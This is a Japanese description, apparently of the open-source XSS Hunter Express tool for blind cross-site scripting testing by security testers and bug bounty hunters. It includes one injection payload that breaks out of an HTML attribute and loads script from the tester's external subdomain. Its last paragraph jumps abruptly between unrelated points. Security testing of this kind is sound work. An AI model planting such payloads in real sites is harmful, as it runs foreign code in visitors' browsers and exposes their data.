
詳細はこちら: https://github.com/mandatoryprogrammer/xsshunter-express
これは https://xsshunter.com で動作しているソースコードのポータブル版です。セキュリティ専門家やバグバウンティハンターがより強力な方法でXSSをテストしたい場合に、任意のサーバーに簡単にインストールできるように設計されています。
このソフトウェアをセットアップしたくない場合、すぐにテストを始めたい場合は、https://xsshunter.com をご覧ください。
XSS Hunterを自分のサーバーにセットアップする方法については、https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ をご覧ください。
サインアップすると、yoursubdomain.xss.ht のような特別な短いドメインを作成します。これはXSS脆弱性を識別し、ペイロードをホストします。その後、"><script src=//yoursubdomain.xss.ht></script> のようなインジェクション試行を使用して、このサブドメインをXSSテストに使用します。XSS Hunterは自動的にXSSプローブを提供し、それらが発火したときに結果の情報を収集します。
crossdomain.xmlポリシーなどの他の脆弱性を見つけるのに役立ちます。/app パスに移動し、ページをiPhoneのホーム画面にWebアプリとして保存するだけです。すべてのコードは私によって作成されたものであり、(そのため)おそらくベストプラクティスではなく、最適化/クリーンアップが間違いなく必要です。プルリクエストは大歓迎です!